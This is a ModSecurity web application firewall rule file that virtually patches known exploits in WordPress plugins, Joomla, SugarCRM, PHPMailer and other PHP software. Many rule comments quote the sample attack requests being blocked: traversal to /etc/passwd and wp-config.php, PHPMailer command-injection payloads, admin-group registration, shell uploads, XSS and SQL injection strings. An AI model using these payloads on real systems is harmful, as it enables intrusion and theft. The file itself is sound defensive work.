Secrule REQUEST_URI "(?:admin-ajax|admin-post)\.php" "phase:2,chain,deny,log,auditlog,status:403,t:none,t:removeNulls,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,capture,id:347160,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: WordPress Admin Ajax unauthenticated plugin/extension exploit blocked',logdata:'%{TX.0}'"
SecRule ARGS:action "wcp_change" "t:none,t:lowercase,chain"
SecRule ARGS:width|ARGS:height "(?:https?|fromcharcode|script)" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase"
SecMarker END_PHP_ADMIN_AJAX
#/wp-content/plugins/yuzo-related-post/assets/js/admin.js
SecRule REQUEST_URI "/wp-content/plugins/yuzo" "phase:2,deny,log,auditlog,id:382245,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Access attempt or probe for known vulnerable yuzo-related-post Plugin blocked'"
#GET /admin.php?dispatch=auth.login_form&return_url=admin.php
SecRule REQUEST_URI "admin\.php" "chain,phase:2,deny,log,auditlog,id:382241,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: auth.login_form probe blocked'"
SecRule ARGS:dispatch "auth\.login_form" "t:none,t:urlDecodeUni,t:lowercase,chain"
SecRule ARGS:return_url "^admin\.php$" "t:none,t:urlDecodeUni,t:lowercase"
#GET /admin/index.php?route=common/login
SecRule REQUEST_URI "index\.php" "chain,phase:2,deny,log,auditlog,id:382242,rev:4,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: auth.login_form probe blocked'"
SecRule ARGS:route "common/login" "t:none,t:urlDecodeUni,t:lowercase,chain"
SecRule REQUEST_METHOD "GET" "t:none,chain"
SecRule REQUEST_HEADERS:Referer "!(\?route=)" "t:none,t:lowercase"
#wp-content/plugins/sf-booking/lib/downloads.php?file=/index.php
SecRule REQUEST_URI "sf-booking/lib/downloads\.php" "chain,phase:2,deny,log,auditlog,id:393743,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress Service Finder Booking Local File Disclosure blocked'"
SecRule ARGS:file "/" "t:none,t:urlDecodeUni"
#phpCollab 2.5.1 Unauthenticated File Upload
SecRule REQUEST_URI "logos_clients/.*\.ph(?:p|tml|t)" "phase:2,deny,log,auditlog,id:391746,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpCollab 2.5.1 Unauthenticated File Upload blocked'"
#status_rrd_graph_img.php?database=queues;
SecRule REQUEST_URI "status_rrd_graph_img\.php" "chain,phase:2,deny,log,auditlog,id:391747,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress LearnDash 2.5.3 File Upload'"
SecRule ARGS:database ";" "t:none,t:urlDecodeUni"
# WP Cherry Plugin Exploit Unrestricted File Upload
SecRule REQUEST_URI "cherry-plugin/admin/import-export/upload.php" "chain,phase:2,deny,log,auditlog,id:391756,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WP Cherry Plugin Unauthenticated File Upload blocked'"
SecRule REQUEST_METHOD "POST" "t:none"
#wp-content/uploads/assignments/shell.php.
SecRule REQUEST_URI "wp-content/uploads/assignments/.*\.ph(?:p|tml|t)" "phase:2,deny,log,auditlog,id:391748,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress LearnDash 2.5.3 File Upload'"
#/components/com_advertisementboard/efiles/[shell].php
SecRule REQUEST_URI "/components/com_advertisementboard/efiles/.*\.ph(?:p|tml|t)" "phase:2,deny,log,auditlog,id:391749,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Advertisement board Joomla classifieds extension 3.2.0 - Remote Shell Upload Vulnerability blocked'"
#GET admin/utilities/elfinder_init?cmd=mkfile&name=shell.php5&target=[dir]
SecRule REQUEST_URI "admin/utilities/elfinder_init" "chain,phase:2,deny,log,auditlog,id:391759,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PerfexCRM 1.9.7 a Unrestricted php5 File upload blocked'"
SecRule ARGS:cmd "mkfile" "t:none,t:urlDecodeUni,t:lowercase,chain"
SecRule ARGS:name "ph\.(?:p|tml|t)" "t:none,t:urlDecodeUni,t:lowercase"
#demo/campaign/user-export.php
#demo/campaign/info.php
SecRule REQUEST_URI "demo/campaign/(?:user-export|info)\.php" "phase:2,deny,log,auditlog,id:390747,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Boost My Campaign 1.1 Unauthenticated Administrative Access blocked'"
#action=td_ajax_update_panel&wp_option%5Bdefault_role%5D=administrator
SecRule REQUEST_URI "/wp-admin/admin-ajax\.php" "chain,capture,phase:2,deny,log,auditlog,id:390769,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress Theme Newspaper 6.7.1 - Privilege Escalation attack'"
SecRule ARGS:action "td_ajax_update_panel" "t:none,t:urlDecodeUni,t:lowercase,chain"
SecRule ARGS:/wp_option/ "(?:administrator|users_can_register)" "t:none,t:lowercase,t:urlDecodeUni"
#payload = ""attacker' -oQ/tmp/ -X%s/phpcode.php some"@email.com" % RW_DIR
#payload = '"attacker" -oQ/tmp/ -X%s/phpcode.php some"@email.com' % RW_DIR
SecRule ARGS:email|ARGS:from|ARGS:sender|ARGS:name "(?:-oQ ?\.?\.?/|-X.*php)" "capture,phase:2,deny,log,auditlog,id:390849,rev:2,t:none,t:UrlDecodeUni,t:compressWhiteSpace,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPMailer remote code execution attack'"
#joomla
#/component/users/?task=user.register
#form[option]=com_users&user[password1]=password&user[username]=hacker&form[email2]=hacker@example.com&57e059d466318587a8f989565046e656=1&form[password2]=password&user[email2]=hacker@example.com&form[task]=user.register&user[password2]=password&user[name]=hacker&user[email1]=hacker@example.com&user[groups][]=7&form[name]=hacker&user[activation]=0&form[password1]=password&form[username]=hacker&form[email1]=hacker@example.com&user[block]=0
SecRule REQUEST_URI "/component/users/\?task=user\.register" "chain,capture,phase:2,deny,log,auditlog,id:390749,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla privilege escalation attack'"
SecRule ARGS:form[option] "com_users" "t:none,t:urlDecodeUni,t:lowercase,chain"
SecRule ARGS:user[groups][] "7" "t:none,t:urlDecodeUni"
#Vuln vulnerable joomla plugin
SecRule REQUEST_URI "modules/mod_simplefileuploadv1\.3" "phase:2,deny,log,auditlog,id:390746,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Known Vulnerable Joomla Simple File Upload v1.3 Access blocked'"
#known malware
#A.php?username=himel_site&db=himel_base&edit=jos_users&where%5Bid%5D=62
SecRule &ARGS:username "@eq 1" "chain,capture,phase:2,deny,log,auditlog,id:390745,rev:1,t:none,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Known PHP malware'"
SecRule &ARGS:db "@eq 1" "t:none,chain"
SecRule ARGS:edit "(?:jos_users|insp_users)" "t:none,t:urlDecodeUni,t:lowercase,chain"
SecRule &ARGS:where[id] "@eq 1" "t:none"
#http://localhost/path//administrator/components/com_aceftp/quixplorer/index.php?action=download&dir=&item=configuration.php&order=name&srt=yes
SecRule REQUEST_URI "quixplorer" "chain,capture,phase:2,deny,log,auditlog,id:390744,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla com aceftp Arbitrary File Download Vulnerability'"
SecRule ARGS:action "download" "t:none,t:urlDecodeUni,t:lowercase,chain"
SecRule ARGS:item "configuration\.php" "t:none,t:urlDecodeUni,t:lowercase"
SecRule REQUEST_URI "/(?:upload|sugarrestserialize)\.php" "chain,capture,phase:2,deny,log,auditlog,id:391744,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SugarCRM PHP Code injection attack'"
SecRule ARGS:/ext_rest_insideview/|ARGS:rest_data "(?:\(chr ?\( ?[0-9]{1,3} ?\)| ?= ?f(?:open|write) ?\(|\b(?:passthru|serialize|php_uname|phpinfo|shell_exec|preg_\w+|mysql_query|exec|eval|base64_decode|decode_base64|rot13|base64_url_decode)\b ?(?:\(|\:)|\b(?:system|include)\b ?\((?:\'|\"|\$))" "t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace"
SecRule REQUEST_URI "/index\.php" "chain,capture,phase:2,deny,log,auditlog,id:391745,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SugarCRM Insecure fopen attack'"
SecRule ARGS:type_module "expect\://" "t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace"
#/movefile.php
SecRule REQUEST_URI "/movefile\.php" "chain,capture,phase:2,deny,log,auditlog,id:391741,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Roxy File Manager Shell Upload Attack'"
SecRule ARGS:n "\.ph(?:p|t)" "t:none,t:urlDecodeUni,t:lowercase"
#ehcpbackup.php
SecRule REQUEST_URI "/ehcpbackup.php" "capture,phase:2,deny,log,auditlog,id:391739,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Easy Hosting Control Panel plaintext password attack denied'"
#/wp-content/plugins/wp-mobile-detector/resize.php?src=.*php
SecRule REQUEST_URI "/wp-content/plugins/wp-mobile-detector/resize\.php" "chain,capture,phase:2,deny,log,auditlog,id:391740,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress WP Mobile Detector 3.5 Shell Upload'"
SecRule ARGS:src "\.ph(?:p|t)" "t:none,t:urlDecodeUni,t:lowercase"
#ehcp/test/up2.php
#http://<IP>/ehcp/test/upload2.php
#http://<IP>/ehcp/test/upload.php
#http://<IP>/ehcp/test/up.php
SecRule REQUEST_URI "/ehcp/test/up" "capture,phase:2,deny,log,auditlog,id:391709,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Easy Hosting Control Panel Unauthenticated File upload attack denied'"
#http://localhost/pivotx_latest/pivotx/
#index.php?page=media&file=imageshell.png&pivotxsession=ovyyn4ob2jc5ym92&answer=
#shell.php
SecRule REQUEST_URI "/pivotx/" "chain,capture,phase:2,deny,log,auditlog,id:393739,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PivotX shell upload attack denied'"
SecRule ARGS:answer "\.php" "t:none,t:urlDecodeUni,t:lowercase"
#admin-logs.php
SecRule REQUEST_URI "/admin-logs.php" "chain,capture,phase:2,deny,log,auditlog,id:393738,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Zenphoto RFI attack denied'"
SecRule ARGS:tab "^(?:ogg|tls|gopher|data|php|glob|phar|dict|ssh2|rar|expect|zip|zlib|(?:ht|f)tps?):/"
#/php-utility-belt/ajax.php
SecRule REQUEST_URI "/php-utility-belt/ajax\.php" "capture,phase:2,deny,log,auditlog,id:393737,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP utility belt access denied'"
#ui/js/3rd/plupload/examples/upload.php
SecRule REQUEST_URI "ui/js/3rd/plupload/examples/upload\.php" "capture,phase:2,deny,log,auditlog,id:393734,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Yeager CMS unauthenticated upload blocked'"
#libs/org/adodb_lite/tests/
SecRule REQUEST_URI "libs/org/adodb_lite/tests/" "chain,capture,phase:2,deny,log,auditlog,id:393721,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Yeager CMS SSRF attack blocked '"
SecRule ARGS:dbhost "^(?:127|10|172\.16|192)\." "t:none"
#/_admin/site.link-list.php
SecRule REQUEST_URI "_admin/site\.link-list\.php" "chain,capture,phase:2,deny,log,auditlog,id:393720,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Grawlix 1.0.3: Code Execution '"
SecRule FILES|FILES_NAMES "\.ph(?:p|tml|t)$" "t:none,t:urlDecodeUni,t:lowercase,t:removeWhiteSpace"
## multipart/form-data name evasion attempts
SecRule REQUEST_URI "kcfinder/browse\.php\?type=image" "chain,capture,phase:2,deny,log,auditlog,id:393719,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CouchCMS 1.4.5: Code Execution attack blocked'"
SecRule FILES|FILES_NAMES "\.ph(?:p|tml|t)$" "t:none,t:urlDecodeUni,t:lowercase,t:removeWhiteSpace"
#/main_bigware_43.php/main_bigware_79.php
SecRule REQUEST_URI "/main_bigware_[0-9]+\.php/main_bigware_[0-9]+\.php" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:364577,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Bigware Shop 2.3.01 File Upload Attack blocked'"
#/web/download_file.php?file=../../app/etc/local.xml
SecRule REQUEST_FILENAME "web/download_file\.php" "chain,phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:344577,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Magmi file recursion attack '"
SecRule ARGS:file "\.\./\.\./" "t:none,t:urlDecodeUni"
#/files/attach/attachement_6/backdoor.php5
SecRule REQUEST_FILENAME "/files/attach/attachement.*/.*\.php" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:344477,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ProjeQtor 4.5.2 Shell Upload attack'"
#persistant=*'"`
SecRule REQUEST_FILENAME "/main\.php" "chain,phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:344479,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Centreon 2.6.1 Command Injection Vulnerability attack'"
SecRule ARGS:persistant "\'\"\`" "t:none,t:urlDecodeUni"
#/avatar/image_name /.*php2345
SecRule REQUEST_FILENAME "/avatar/image_name/.*\.ph(?:p|tml|t)" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:343478,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Collabtive 2.0 Shell Upload attack'"
#img/media/.*/.*.php
#SecRule REQUEST_FILENAME "/img/media/.*/.*\.ph(?:p|t|tml)" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:343480,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Centreon 2.6.1 Unrestricted File Upload Vulnerability attack'"
#/test/logo/.*php
SecRule REQUEST_FILENAME "/test/logo/.*\.ph(?:p|t|tml)" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:343481,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Vtiger CRM 6.3 Remote Code Execution attack'"
#/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%22%3Ealert(%27xss%27)%3C/script%3E%3Cscript%20src=%22
SecRule REQUEST_FILENAME "js/window\.php" "chain,phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:348476,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress Plugin Navis Documentcloud XSS Vulnerability attack'"
SecRule ARGS:wpbase "(?:script|\" ?>)" "t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace"
SecRule REQUEST_URI "/pluck/" "id:335895,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:349303,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_JITP_PLUCK"
SecRule REQUEST_FILENAME "pluck/admin\.php" "chain,phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:348477,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Pluck remote code injection attack '"
SecRule ARGS:action "files" "chain,t:none,t:lowercase"
Secrule REQUEST_BODY "php" "t:none,t:lowercase"
#files/phpinfo.php5
SecRule REQUEST_FILENAME "pluck/files/phpinfo\.php5" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:348478,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Pluck recon phpinfon attack '"
SecMarker END_PHP_JITP_PLUCK
#wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--
#version() ; --
SecRule REQUEST_FILENAME "get_album_item\.php" "chain,phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:347475,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress Plugin wp-symposium Unauthenticated SQL Injection Vulnerability attack'"
SecRule ARGS:size "(?:version|--| )" "t:none,t:urlDecodeUni,t:lowercase"
#WordPress WP Symposium Plugin 15.1 - Blind SQL Injection
SecRule REQUEST_FILENAME "forum_functions\.php" "chain,phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:347476,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress Plugin wp-symposium Unauthenticated SQL Injection Vulnerability attack'"
SecRule ARGS:topic_id "(?:sleep|select|\(| )" "t:none,t:urlDecodeUni,t:lowercase"
#avatarurl=http://localhost:11211
#profile.php
SecRule REQUEST_FILENAME "profile\.php" "chain,phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:347474,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: vBulletin Memcache Remote Code Execution Attack'"
SecRule ARGS:avatarurl "https?\://(?:localhost|127\.)" "t:none,t:urlDecodeUni,t:lowercase"
#Microweber v1.0.3 File Upload Filter Bypass Remote PHP Code Execution
SecRule REQUEST_FILENAME "/userfiles/media/[a-z]+/uploaded/*\.php" "phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:337472,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Microweber v1.0.3 File Upload Filter Bypass Remote PHP Code Execution attempt'"
#These really asrent necessary, the generic rules already stop these
#WordPress WPTF Image Gallery 1.03 File Download
#/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd
#Remote file download in simple-image-manipulator v1.0 wordpress plugin
#/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd"
#/wp-content/plugins/recent-backups/download-file.php?file_link=/etc/passwd
#/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd
SecRule REQUEST_FILENAME "(?:wptf-image-gallery/lib-mbox/ajax_load\.php|simple-image-manipulator/controller/download\.php|recent-backups/download-file\.php|candidate-application-form/downloadpdffile\.php)" "chain,phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace,id:337473,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Generic wordpress plugins Upload Filter Bypass Remote file access attempt'"
SecRule ARGS:url|ARGS:filename|ARGS:file_link|ARGS:filepath "/(?:etc|home|var|root|usr)/" "t:none,t:urlDecodeUni,t:lowercase"
#WordPress Fast Image Adder 1.1 Shell Upload
#/wp-content/plugins/fast-image-adder/fast-image-adder-uploader.php?confirm=url&url=http://192.168.0.2/shell.php
SecRule REQUEST_FILENAME "/plugins/fast-image-adder/fast-image-adder-uploader\.php" "chain,phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace,id:337474,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress Fast Image Adder 1.1 Shell Upload attack'"
SecRule ARGS:url "^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"
#https://localhost/phpFileManager-0.9.8/index.php?action=6&current_dir=C:/xampp/htdocs/phpFileManager-0.9.8/&cmd=c%3A\Windows\system32\cmd.exe
SecRule REQUEST_FILENAME "/index\.php" "chain,phase:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:337475,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress Fast Image Adder 1.1 Shell Upload attack'"
SecRule &ARGS:Action "@eq 1" "t:none,chain"
SecRule ARGS:current_dir "^[a-z]\:" "chain,t:none,t:urlDecodeUni,t:lowercase"
SecRule ARGS:cmd "\.exe$" "t:none,t:urlDecodeUni,t:cmdLine"
#admin-ajax.php attacks
SecRule REQUEST_URI "/uploadify\.php" "id:335867,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:349313,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_JITP_UPLOADIFY"
#folder=%2fwordpress%2fwp%2dcontent%2fplugins%2fwp%2dproperty%2fthird%2dparty%2fuploadify%2f
#folder=/wordpress/wp-content/plugins/wp-property/third-party/uploadify/
#wp-content/plugins/barclaycart/uploadify
SecRule REQUEST_URI "/uploadify\.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:337470,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress uploadify upload Attack'"
SecRule ARGS:folder "/wp-content/.*/uploadify/" "t:none,t:urlDecodeUni,t:lowercase"
#Block anything thats not jpg,jpeg,gif,png,mpg,mpeg,flv
SecRule REQUEST_URI "/uploadify\.php" "capture,phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:337471,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: uploadify non-media file upload violation',logdata:'%{TX.0}'"
SecRule ARGS:Filename|ARGS:Filedata "!((?:m|j)pe?g4?|bmp|tiff?|p(?:(?:p|g|b)m|n(?:g|m)|df|s)|gif|ico|avi|w(?:mv|ebp)|mp(?:3|4)|cgm|svg|swf|og(?:m|v|x)|doc|xls|od(?:t|s)|ppt|wbk)$" "t:none,t:urlDecodeUni,t:lowercase"
SecRule REQUEST_URI "/uploadify\.php" "capture,phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:337476,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: uploadify RFI attack blocked',logdata:'%{TX.0}'"
SecRule ARGS:src "^(?:ogg|tls|gopher|data|php|glob|phar|dict|ssh2|rar|expect|zip|zlib|(?:ht|f)tps?):/" "t:none,t:urlDecodeUni,t:lowercase"
SecMarker END_PHP_JITP_UPLOADIFY
SecRule REQUEST_URI "wp-admin/(?:index|admin-ajax)\.php" "chain,capture,phase:2,deny,log,auditlog,id:393726,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress WooCommerce Privilege Escalation'"
SecRule ARGS:action "nuke" "t:none,t:urlDecodeUni,t:lowercase,chain"
SecRule ARGS:/woo_st/ "1" "t:none,t:urlDecodeUni,t:lowercase"
#action=nuke&woo_st_products=1
#admin-ajax.php attacks
SecRule REQUEST_URI "/wp-admin/admin-ajax\.php" "id:335865,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:349300,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_JITP_ADMIN_AJAX1"
#/wordpress/wp-admin/admin-ajax.php
#action=wpuf_file_upload
SecRule ARGS:action "wpuf_file_upload" "capture,phase:2,deny,log,auditlog,id:393725,rev:1,t:none,t:urlDecodeUni,t:lowercase,t:removecomments,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress WP User Frontend Plugin Unrestricted File Upload blocked'"
#Just the silly test case, in case someone panics that the POC "worked"
#wp-admin/admin-ajax.php\?action=umm_switch_action &umm_sub_action=[umm_delete_user_meta|umm_edit_user_meta]&umm_user=SLEEP"
SecRule REQUEST_URI "wp-admin/admin-ajax\.php" "chain,capture,phase:2,deny,log,auditlog,id:393723,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress Blind SQLi POC blocked'"
SecRule ARGS:umm_user "(?:sleep|\b(?:select|union) )" "t:none,t:urlDecodeUni,t:lowercase,t:removecomments"
SecRule ARGS:umm_sub_action "umm_get_csv" "capture,phase:2,deny,log,auditlog,id:393727,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Wordpress User Meta Manager Plugin Information Disclosure attack blocked'"
SecRule ARGS:umm_sub_action "umm_backup" "chain,capture,phase:2,deny,log,auditlog,id:393728,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Wordpress User Meta Manager Plugin Information Disclosure attack blocked'"
SecRule ARGS:mode "sql" "t:none,t:urlDecodeUni,t:lowercase"
SecRule REQUEST_URI "wp-admin/admin-ajax\.php" "chain,capture,phase:2,deny,log,auditlog,id:393724,rev:1,t:none,t:urlDecodeUni,t:lowercase,t:removecomments,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress Privilege Escalation attack blocked'"
SecRule ARGS:umm_meta_value "administrator" "t:none,t:urlDecodeUni,t:lowercase"
#new revslider vuln
#/wp-admin/admin-ajax.php
#action=revslider%5fajax%5faction&client%5faction=update%5fplugin
#action=revslider_ajax_action&client_action=update_plugin
#action=revolution-slider_ajax_action&client_action=update_plugin
#Cookie:
#/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
SecRule REQUEST_URI "/wp-admin/admin-ajax\.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:337469,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress Revslider upload Attack'"
SecRule ARGS:action "(?:revslider_ajax_action|revolution-slider_ajax_action)" "chain,t:none,t:urlDecodeUni,t:lowercase"
SecRule ARGS:client_action "(?:update_plugin|get_captions_css)" "chain,t:none,t:urlDecodeUni,t:lowercase"
SecRule &ARGS:nonce "@eq 0"
#/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
SecRule REQUEST_URI "/wp-admin/admin-ajax\.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:337479,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress Revslider non-image file download Attack'"
SecRule ARGS:action "revslider_show_image" "chain,t:none,t:urlDecodeUni,t:lowercase"
SecRule ARGS:img "\.php" "t:none,t:urlDecodeUni,t:lowercase"
SecMarker END_PHP_JITP_ADMIN_AJAX1
#Wordpress XSS
SecRule REQUEST_URI "/wp-comments-post.php" "phase:2,chain,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace,capture,id:336469,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress Stored XSS Attack',logdata:'%{TX.0}'"
SecRule ARGS:/comment/ "(?:< ?script|(?:<|< ?/)(?:(?:java|vb)script|about|applet|activex|chrome)|< ?/?i?frame|\%env|(?:\.add|\@)import |asfunction\:|background-image\:|e(?:cma|xec)script|\.fromcharcode|get(?:parentfolder|specialfolder)|\.innerhtml|\< ?input|(?:/|<) ?(?:java|live|j|vb)script!s|lowsrc ?=|mocha\:|\bon(?:abort|blur|change|click|submit|select|dragdrop|focus|key(?:down|press|up)|mouse(?:down|move|out|over|up))\b ?=.|shell\:|window\.location|asfunction:_root\.launch)" "t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace"
#plugin_googlemap2_proxy.php?url=loxer.cf
